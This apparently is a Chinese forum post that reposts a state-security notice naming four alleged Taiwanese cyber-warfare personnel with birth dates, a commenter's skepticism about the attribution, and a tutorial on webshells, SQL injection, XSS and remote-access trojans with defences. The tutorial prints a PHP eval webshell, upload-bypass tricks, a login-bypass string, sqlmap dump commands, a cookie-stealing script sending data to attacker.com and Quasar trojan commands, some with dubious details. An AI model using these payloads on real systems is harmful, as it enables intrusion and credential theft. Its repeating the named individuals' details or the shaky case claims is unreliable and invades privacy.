国家安全部近日公布4名“台独”网军人员身份信息,并通报台湾资通电军自2017年6月成立以来,长期充当“台独”势力爪牙,持续对大陆发动网络攻击与渗透活动。国家安全机关将坚决捍卫国家安全,彻查幕后黑手,依法打击“台独”网军的网络间谍及分裂活动。
经深入调查,国家安全机关锁定多名参与策划、指挥及实施网络攻击的关键人员,其中包括:
林钰书,男,1979年1月28日生,现任资通电军网络战联队网络环境研析中心负责人。
蔡杰宏,男,1993年12月23日生,现任网络战联队战队队长。
粘孝帆,男,1982年12月6日生,网络战联队现役人员。
王浩铭,男,1990年5月20日生,网络战联队现役人员。
拙劣的“台独”网络战手法
台湾资通电军专门设立网络战联队,并雇佣黑客及网络安全公司协助,执行民进党当局指令,实施窃密、破坏、反宣等行动。他们惯用手段包括:
攻击关键基础设施:渗透大陆水、电、气、热、通信系统及联网摄像头等关键设施。
投放网络攻击:向大陆党政军企单位发送钓鱼邮件、散布反宣内容。
劫持在线平台:盗取门户网站、电子显示屏、IP广播系统等控制权,插播反宣音视频。
操控舆论:在社交媒体平台豢养大量“机器人”账号,散布虚假信息,误导舆论,监控并打压台湾内部异见人士。
自2023年以来,他们还以“匿名者64”等组织名义,在网络社交平台散播虚假信息,为民进党当局的“台独”行动造势。
然而,资通电军屡屡夸大战果,甚至捏造不存在的攻击案例。在实际行动中,他们大量依赖开源工具,如AntSword(蚁剑)、冰蝎、Metasploit、Quasar等,安全防护形同虚设。国家安全机关已成功查获多个网攻平台,并精准阻断其针对大陆的攻击行动。
工具名称 | 主要用途 | 部署方式 |
---|---|---|
蚁剑(AntSword) | WebShell 远控工具 | 上传 PHP/ASP/JSP WebShell,GUI 连接管理 |
冰蝎(Behinder) | 无文件 WebShell 远控 | 内存加载后门,绕过安全检测 |
Metasploit | 渗透测试框架 | 生成恶意 Payload,利用漏洞攻击目标系统 |
Quasar | Windows 远控木马 | 生成恶意客户端,控制 Windows 设备 |
民进党当局以发展“非对称战力”为名,耗费巨额资金建立网军,妄图对大陆发动网络战。然而,内部管理混乱、问题重重:
高层争功诿过:将下属战果据为己有,遇事甩锅,甚至以“有功者”替罪推责。
基层腐败横行:执行任务期间虚报经费、中饱私囊,与外协单位合谋牟利,甚至捏造攻击成果骗取绩效奖励。
军纪涣散:现役人员发展传销、参与电信诈骗,甚至利用攻击目标进行“挖矿”。
国家安全机关严正警告
国家安全机关正告“台独”网军头目,分裂国家是死路一条,国家安全机关将依据相关法律,对“台独”分裂势力采取一切必要惩治措施,并依法终身追责。同时,警告被裹挟的人员,互联网绝非法外之地,应认清形势,避免沦为“台独”炮灰,立即停止一切分裂国家的网络犯罪活动。
网络安全提醒
“台独”网军常利用漏洞扫描、密码爆破工具发起攻击。国家安全机关提醒各网络服务商、网站运营者:
加强网络安全防护,定期维护系统,修补漏洞,提高密码强度,强化日志审计,降低数据泄露风险。
广大网民应注意保护个人隐私,定期更换社交平台、邮箱等账号密码,警惕网络虚假信息,避免被“台独”网军利用。
其实这个事情好像是2023年就有报过的消息了,Anonymous64 当时有发布过一段视频在讲述中国共产党与习近平如何对待中国老百姓(但可能实际上更早),2019年经历疫情封城,还有香港返送中也是在2019年爆发,因此,我记得没错的话,真正的匿名者64(Anonymous64)是香港人,并不是台湾,但目前看起来被中国官方泼粪,但是也很有可能是这四位有跟一些发动攻击网站的组织有联系log被找到蛛丝马迹,台湾这边可能是"雇佣黑客"的金主,并不是实施人员,据我所知台湾厉害的黑客甚少(例如唐凤就蛮搞笑)。
目前,关于“Anonymous64”是否属于台湾资通电军的直接技术证据(如代码日志、服务器IP、攻击路径等)并未被公开披露。
中国大陆官方(如国家安全部)声称该组织受“台独”势力支持,并归属于台湾资通电军的网络战联队,但相关证据仅在官方报道中提及,未公布具体的技术分析报告。例如,CCTV 的报道引用了国家安全机关的指控,但未提供网络溯源的具体细节,如攻击流量日志、恶意软件样本或攻击指令的来源。
在类似的网络战归因中,通常需要以下证据链:
- IP地址与服务器:攻击来源的IP地址是否与台湾政府或军方机构有关。
- 恶意代码样本:是否有与台湾军方过往攻击行为类似的恶意软件或代码模式。
- C2(命令与控制)服务器:是否有证据表明攻击者使用了台湾军方或政府支持的基础设施进行控制。
- 通信与资金流:是否有任何资金或信息流动能直接关联到台湾官方机构。
- 由于网络战的复杂性,攻击者通常会使用代理服务器、VPN、Tor等手段隐藏真实身份,因此仅凭社交媒体言论或攻击声明难以完全确认其背景。
ICEFCOM 这个单位应该不会这么无聊,拿站之后,然后放什么毋忘64,而且使用开源工具自动化扫地址,中国政府网站很多都是很老旧的网站框架,漏洞特别多,所以劫持成功没什么了不起的,很多大型网站都是前后段分离,xss攻击基本上也没用,媒体说的工具跟以前有个中国大神开发的"菜刀"似乎是差不多的,因此中国官方那边的指控应该也是不实的指控。
攻击手段 | 工具 | 真实案例 | 防御措施 |
---|---|---|---|
WebShell | 蚁剑、冰蝎 | 乌克兰政府被黑 | 限制上传目录执行权限,禁用危险函数 |
SQL 注入 | SQLmap | Domino’s Pizza 数据泄露 | 预编译 SQL 语句,WAF 防护 |
XSS | BeEF | eBay 被 XSS 攻击 | 过滤输入 & 输出,启用 CSP |
远程木马 | Quasar | Fancy Bear 攻击欧美政府 | 禁止普通用户运行 .exe,使用 EDR |
1. WebShell 远程控制
案例:2019 年某国内政府网站被植入 WebShell
攻击手法
黑客利用 文件上传漏洞(未校验文件类型)上传恶意 PHP WebShell
通过 WebShell 远程控制服务器,访问数据库,篡改网页内容
攻击工具
(1)利用 WebShell 控制服务器
工具:蚁剑 / 冰蝎
上传 恶意 PHP 脚本,例如:
代码: 全选
<?php @eval($_POST['cmd']); ?>
连接 http://target.com/uploads/shell.php,远程执行命令:
[code]whoami
ls /var/www/html
(2)绕过上传限制
伪造 MIME 类型
上传 shell.php.jpg,修改 HTTP 头部:
代码: 全选
Content-Type: image/jpeg
代码: 全选
SetHandler application/x-httpd-php
禁止 PHP 在上传目录执行:
代码: 全选
location /uploads/ {
deny all;
}
采用 WAF 防火墙(如 ModSecurity)阻止恶意流量
2. SQL 注入(SQLi)
历史案例:2014 年 Domino’s Pizza 事件
2014 年,黑客利用 SQL 注入攻击 Domino’s Pizza 服务器,成功获取 60 万条客户信息,包括地址、电话和信用卡信息。
攻击方式
工具:SQLmap、手动注入 攻击者在 用户输入未做过滤 的情况下,利用 SQL 语句操控数据库。
实施步骤
测试漏洞
- 访问 http://target.com/login.php
- 输入 admin' OR '1'='1 进行测试
- 如果直接绕过登录,则存在 SQLi
代码: 全选
sqlmap -u "http://target.com/login.php" --data "username=admin&password=123" --dump
--dbs:获取数据库列表
防御措施
使用预编译 SQL 语句(Prepared Statements) 输入验证(仅允许预期格式的输入,如数字、邮箱格式) Web 应用防火墙(WAF)拦截 SQLi 攻击
3. XSS(跨站脚本攻击)
历史案例:2014 年 eBay 被 XSS 攻击 黑客在 eBay 的搜索框插入恶意 JS 代码,使得访问该页面的用户被自动跳转到钓鱼网站,输入的登录凭据被盗取。
攻击方式
工具:手动、BeEF(浏览器攻击工具) XSS 主要用于劫持 Cookie、窃取敏感信息、执行 CSRF。
实施步骤
插入恶意 JavaScript
在网站的评论框输入:
代码: 全选
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>
利用 BeEF 进一步攻击
代码: 全选
./beef
输入 & 输出过滤(HTML 转义) 使用 Content-Security-Policy (CSP) 限制 JS 执行 设置 HttpOnly,防止 JavaScript 读取 Cookie
4. 远程控制木马(RAT)
历史案例:俄罗斯 Fancy Bear 组织 该组织利用 Quasar 远控木马攻击欧美政府机构,成功窃取了机密文件。
攻击方式
工具:Quasar 攻击者诱导目标下载伪装成正常软件的木马,如:
代码: 全选
quasar.exe --build --host attacker.com --port 443
伪装木马
- 伪装为 security_update.exe
- 通过钓鱼邮件传播
受害者运行木马后,Quasar 控制台显示目标上线:
代码: 全选
quasar.exe --connect target.com
- 远程桌面控制
- 下载/上传文件
- 录制键盘输入(窃取密码)
禁止普通用户运行 .exe 使用 EDR 监控可疑进程 限制管理员账户的权限